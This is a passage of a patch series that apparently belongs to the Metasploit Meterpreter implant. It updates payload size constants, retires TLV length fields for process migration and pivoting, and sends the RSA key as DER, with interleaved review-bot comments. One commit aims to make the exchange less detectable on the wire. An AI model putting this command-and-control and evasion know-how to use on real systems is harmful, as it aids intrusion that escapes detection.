b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1036536 + CachedSize = 1032344 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 6059c403d1d44..8be0933a97033 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1102196 + CachedSize = 1097244 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index e41dac3332dc9..95489b3cd69d0 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb 
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1102196 + CachedSize = 1097244 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 95c5c229e370b..6c0d8004b0253 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1102196 + CachedSize = 1097244 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index 4e5f620f2cea2..d3ae60d720bd5 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1230712 + CachedSize = 1226520 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 5f12aa5f0c38e..9489a827448aa 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1230712 + CachedSize = 1226520 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 54b50d43416d4..4fb12ae67cbb7 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb 
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1230712 + CachedSize = 1226520 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index cf1bf3c059698..f66a670dd984b 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 804084 + CachedSize = 799916 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index 2f18ae658c73c..745f9ff3fc57e 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 804084 + CachedSize = 799916 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index fe113be5982cc..7183a9411210c 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 804084 + CachedSize = 799916 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index ab559f45a3cec..d7720a0e36a3f 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb 
@@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 30691 + CachedSize = 34011 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 26f16cfc20da6..b5a3462c3de94 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 71945 + CachedSize = 81293 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index f77ca89e1de37..6b1534f156743 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 71913 + CachedSize = 81261 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index b7cb94094f3a9..1b7d4976ca53b 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 71913 + CachedSize = 81261 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index ed2ceb694493c..490142bf4ab5a 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 71845 + CachedSize = 81193 include Msf::Payload::Single include Msf::Payload::Python 
diff --git a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb index 8e6c1f38e114c..2313a5a7d79e9 100644 --- a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb @@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 4352 + CachedSize = 4416 include Msf::Payload::Windows include Msf::Payload::Single diff --git a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb index 626c331b3c4df..7a297fb7c0174 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176198 + CachedSize = 175174 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index b84f131cf1bf8..7275dbb490b8a 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176198 + CachedSize = 175174 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 52a59ffbc536d..c0bb7b1c974b0 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 177244 + CachedSize = 176220 include Msf::Payload::TransportConfig include Msf::Payload::Windows 
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index d1efef0e15483..388413bb30d4c 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 177244 + CachedSize = 176220 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 868c2ea691761..3e739a48360e1 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176198 + CachedSize = 175174 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 2a109914a82d2..b4aa877a4ab44 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176198 + CachedSize = 175174 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb index 8a921fe186205..53083adaf2475 100644 --- a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 4064 + CachedSize = 4000 include Msf::Payload::Windows include Msf::Payload::Single 
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb index 9d5b4a167ddb6..7de4f1bdd9013 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201286 + CachedSize = 199750 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 2473cb95a0243..18791f5005128 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201286 + CachedSize = 199750 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 7dd31a44a4c4e..2477ea3b01d1c 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 202332 + CachedSize = 200796 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 21c0aa7535d04..49cd9d293b0e2 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 202332 + CachedSize = 200796 include Msf::Payload::TransportConfig include Msf::Payload::Windows 
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index a6f5a125f1745..d17572d538021 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201286 + CachedSize = 199750 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 2a1139d0f92fe..f63565944ea48 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201286 + CachedSize = 199750 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb index 6ae7561f887e8..dd2c8e7f0d3f1 100644 --- a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb +++ b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule - CachedSize = 2848 + CachedSize = 2880 include Msf::Payload::Stager include Msf::Payload::Windows::EncryptedReverseTcp diff --git a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb index 74f709532087b..67fb7bb327647 100644 --- a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule - CachedSize = 2576 + CachedSize = 2560 include Msf::Payload::Stager include Msf::Payload::Windows::EncryptedReverseTcp From 5b69fe97573636a58490b0ee61b1c5f0441d41d5 Mon Sep 17 00:00:00 2001 
From: Brent Cook
Date: Wed, 3 Jun 2020 07:27:47 -0500
Subject: [PATCH 17/20] reverse_python_ssl has has apparently stabilized in size

---
 spec/modules/payloads_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index ee874d41d95ec..820f2eac7038a 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -953,7 +953,7 @@
 ancestor_reference_names: [
 'singles/cmd/unix/reverse_python_ssl'
 ],
- dynamic_size: true,
+ dynamic_size: false,
 modules_pathname: modules_pathname,
 reference_name: 'cmd/unix/reverse_python_ssl'
 end

From 209e463c84e507ddb764225ada7f8d05f5254898 Mon Sep 17 00:00:00 2001
From: OJ
Date: Wed, 6 May 2020 09:18:50 +1000
Subject: [PATCH 18/20] Pass DER-encoed public keys instead of PEM

Just to reduce the more obvious thing going across the wire (ie. no more "BEGIN PUBLIC KEY"). We now see binary blobs.
---
 lib/rex/post/meterpreter/client_core.rb | 4 +++-
 lib/rex/post/meterpreter/packet.rb | 3 ++-
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index ace583fb52501..9b71297c5f20e 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -748,9 +748,11 @@ def negotiate_tlv_encryption
 sym_key = nil
 rsa_key = OpenSSL::PKey::RSA.new(2048)
 rsa_pub_key = rsa_key.public_key
+ der = rsa_pub_key.to_der
 request = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
- request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_pem)
+ request.add_tlv(TLV_TYPE_RSA_PUB_KEY, der)
+ request.add_tlv(TLV_TYPE_RSA_PUB_KEY_LEN, der.length)
 begin
 response = client.send_request(request)
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index fdbb33a60dde6..8a6e33e88d12a 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -109,10 +109,11 @@ module Meterpreter
 TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
 TLV_TYPE_SESSION_GUID = TLV_META_TYPE_RAW | 462
-TLV_TYPE_RSA_PUB_KEY = TLV_META_TYPE_STRING | 550
+TLV_TYPE_RSA_PUB_KEY = TLV_META_TYPE_RAW | 550
 TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551
 TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552
 TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553
+TLV_TYPE_RSA_PUB_KEY_LEN = TLV_META_TYPE_UINT | 554
 #
 # Pivots

From 6170f497b6680e15a258a5f3a1ed42c1faf26a68 Mon Sep 17 00:00:00 2001
From: OJ
Date: Wed, 6 May 2020 11:34:10 +1000
Subject: [PATCH 19/20] Fix TLV types and remove ones that no longer exist

---
 lib/rex/post/meterpreter/client_core.rb | 3 ---
 lib/rex/post/meterpreter/extensions/stdapi/tlv.rb | 6 ++----
 lib/rex/post/meterpreter/extensions/stdapi/ui.rb | 2 --
 lib/rex/post/meterpreter/packet.rb | 11 ++---------
 4 files changed, 4 insertions(+), 18 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 9b71297c5f20e..40f28a6f81118 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -629,9 +629,7 @@ def migrate(target_pid, writable_dir = nil, opts = {})
 request = Packet.create_request(COMMAND_ID_CORE_MIGRATE)
 request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
- request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length)
 request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
- request.add_tlv(TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length)
 request.add_tlv(TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib])
 if target_process['arch'] == ARCH_X64
@@ -752,7 +750,6 @@ def negotiate_tlv_encryption
 request = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
 request.add_tlv(TLV_TYPE_RSA_PUB_KEY, der)
- request.add_tlv(TLV_TYPE_RSA_PUB_KEY_LEN, der.length)
 begin
 response = client.send_request(request)
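Review bot: After this hunk the receiving side has no independent size for the migrate payload or stub; the only length left is the one in the TLV header, and both values are sent with `client.capabilities[:zlib]` as the compression flag, so the native handler presumably has to size its buffers from the inflated data rather than the on-wire TLV length — worth confirming against the Meterpreter-side code, which this diff does not show. Dropping the two `*_LEN` TLVs is also a wire-format break for any 5.x payload that still expects them; that is acceptable only because the series moves to 6.0.0, but nothing in `migrate` records it. A one-line comment above the first `add_tlv` would stop someone re-adding the fields: `# Payload/stub sizes come from the TLV header (post-inflation when zlib is on); the *_LEN TLVs were retired in 6.0.` The body of `migrate` begins and ends outside this hunk.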
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 14feacef4b0be..95c77e18df471 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -202,10 +202,8 @@ module Stdapi
 TLV_TYPE_DESKTOP_STATION = TLV_META_TYPE_STRING | 3006
 TLV_TYPE_DESKTOP_NAME = TLV_META_TYPE_STRING | 3007
 TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY = TLV_META_TYPE_UINT | 3008
-TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH = TLV_META_TYPE_UINT | 3009
-TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER = TLV_META_TYPE_STRING | 3010
-TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH = TLV_META_TYPE_UINT | 3011
-TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_STRING | 3012
+TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER = TLV_META_TYPE_RAW | 3010
+TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_RAW | 3012
 TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW = TLV_META_TYPE_BOOL | 3013
 TLV_TYPE_KEYS_SEND = TLV_META_TYPE_STRING | 3014
 TLV_TYPE_MOUSE_ACTION = TLV_META_TYPE_UINT | 3015
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
index 18b355c0a345a..11f3d2aca9f0f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -191,7 +191,6 @@ def screenshot( quality=50 )
 end
 request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
- request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
 end
 # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
@@ -206,7 +205,6 @@ def screenshot( quality=50 )
 end
 request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, screenshot_dll, false, true )
- request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH, screenshot_dll.length )
 end
 # send the request and return the jpeg image if successfull.
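Review bot: Switching 3010 and 3012 from `TLV_META_TYPE_STRING` to `TLV_META_TYPE_RAW` changes the full type value that goes on the wire even though the numeric IDs are kept, so a peer built against the old definitions will not recognise these TLVs; that is an intended 6.0 break, but the file gives no hint of it, and 3009/3011 are now free numbers that should stay reserved rather than be reused with a different meaning. RAW looks like the right type for a PE image, which contains embedded NUL bytes, though how STRING values are terminated or validated on the receiving side is not visible here. A short comment above the two `*_BUFFER` constants would carry both points: `# DLL images are RAW (binary, NUL-containing). 3009/3011 (*_LENGTH) were retired in 6.0 - do not reuse.`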
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 8a6e33e88d12a..624d58f44d633 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -81,14 +81,12 @@ module Meterpreter
 TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
 TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
 TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
-TLV_TYPE_MIGRATE_PAYLOAD_LEN = TLV_META_TYPE_UINT | 403
-TLV_TYPE_MIGRATE_PAYLOAD = TLV_META_TYPE_STRING | 404
+TLV_TYPE_MIGRATE_PAYLOAD = TLV_META_TYPE_RAW | 404
 TLV_TYPE_MIGRATE_ARCH = TLV_META_TYPE_UINT | 405
 TLV_TYPE_MIGRATE_BASE_ADDR = TLV_META_TYPE_UINT | 407
 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT | 408
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
-TLV_TYPE_MIGRATE_STUB_LEN = TLV_META_TYPE_UINT | 410
-TLV_TYPE_MIGRATE_STUB = TLV_META_TYPE_STRING | 411
+TLV_TYPE_MIGRATE_STUB = TLV_META_TYPE_RAW | 411
 TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
@@ -113,14 +111,12 @@ module Meterpreter
 TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551
 TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552
 TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553
-TLV_TYPE_RSA_PUB_KEY_LEN = TLV_META_TYPE_UINT | 554
 #
 # Pivots
 #
 TLV_TYPE_PIVOT_ID = TLV_META_TYPE_RAW | 650
 TLV_TYPE_PIVOT_STAGE_DATA = TLV_META_TYPE_RAW | 651
-TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_META_TYPE_UINT | 652
 TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_META_TYPE_STRING | 653
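Review bot: The retired IDs 403, 410, 554 and 652 now sit as silent gaps next to the pre-existing 406 gap, with nothing saying why they went or that they must not be handed out again; a Meterpreter built from older headers would read a reused number as the length companion it used to be. The reason is implicit in the series — the TLV header already carries the value length, so the separate `*_LEN`/`*_SIZE` fields were redundant — but that belongs in the file where the constants live. Suggest one comment near the migrate block and one near the pivot block, e.g. `# 403/410 (payload/stub length) retired in 6.0: the TLV header carries the length. Reserved - do not reuse.` and the equivalent for 554 and 652. Both hunks are bare constant lists inside `module Meterpreter`, whose opening and closing lie outside the hunks.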
@@ -218,12 +214,10 @@ def inspect
 when TLV_TYPE_LIBRARY_PATH; "LIBRARY-PATH"
 when TLV_TYPE_TARGET_PATH; "TARGET-PATH"
 when TLV_TYPE_MIGRATE_PID; "MIGRATE-PID"
- when TLV_TYPE_MIGRATE_PAYLOAD_LEN; "MIGRATE-PAYLOAD-LEN"
 when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
 when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
 when TLV_TYPE_MIGRATE_BASE_ADDR; "MIGRATE-BASE-ADDR"
 when TLV_TYPE_MIGRATE_ENTRY_POINT; "MIGRATE-ENTRY-POINT"
- when TLV_TYPE_MIGRATE_STUB_LEN; "MIGRATE-STUB-LEN"
 when TLV_TYPE_MIGRATE_STUB; "MIGRATE-STUB"
 when TLV_TYPE_MIGRATE_SOCKET_PATH; "MIGRATE-SOCKET-PATH"
 when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
@@ -246,7 +240,6 @@ def inspect
 when TLV_TYPE_PIVOT_ID; "PIVOT-ID"
 when TLV_TYPE_PIVOT_STAGE_DATA; "PIVOT-STAGE-DATA"
- when TLV_TYPE_PIVOT_STAGE_DATA_SIZE; "PIVOT-STAGE-DATA-SIZE"
 when TLV_TYPE_PIVOT_NAMED_PIPE_NAME; "PIVOT-NAMED-PIPE-NAME"
 #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'

From d1cfbb09826f5f2987eceb0f4f9c528d87f243ff Mon Sep 17 00:00:00 2001
From: OJ
Date: Wed, 6 May 2020 11:47:37 +1000
Subject: [PATCH 20/20] Removal of unnecessary local var

---
 lib/rex/post/meterpreter/client_core.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 40f28a6f81118..056a592271ef5 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -746,10 +746,9 @@ def negotiate_tlv_encryption
 sym_key = nil
 rsa_key = OpenSSL::PKey::RSA.new(2048)
 rsa_pub_key = rsa_key.public_key
- der = rsa_pub_key.to_der
 request = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
- request.add_tlv(TLV_TYPE_RSA_PUB_KEY, der)
+ request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_der)
 begin
 response = client.send_request(request)
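Review bot: Sending `rsa_pub_key.to_der` drops the `BEGIN PUBLIC KEY` banner, but the DER SubjectPublicKeyInfo it produces (the same structure the PEM wrapped) still starts with a fixed, well-known prefix for a 2048-bit RSA key — the outer SEQUENCE length followed by the rsaEncryption OID 1.2.840.113549.1.1.1 — so the value remains a stable byte-pattern signature; the earlier commit's wording about making the exchange "less obvious on the wire" should not be mistaken for a confidentiality gain. As far as this hunk shows, the exchange is also still unauthenticated — a fresh key is generated per call and the peer presumably encrypts a symmetric key under whatever public key arrives — which is pre-existing rather than introduced here. Suggest recording the first point above the `add_tlv` line: `# DER instead of PEM is cosmetic: the SPKI header and RSA OID are still a fixed, fingerprintable prefix.` `negotiate_tlv_encryption` continues past the end of the hunk.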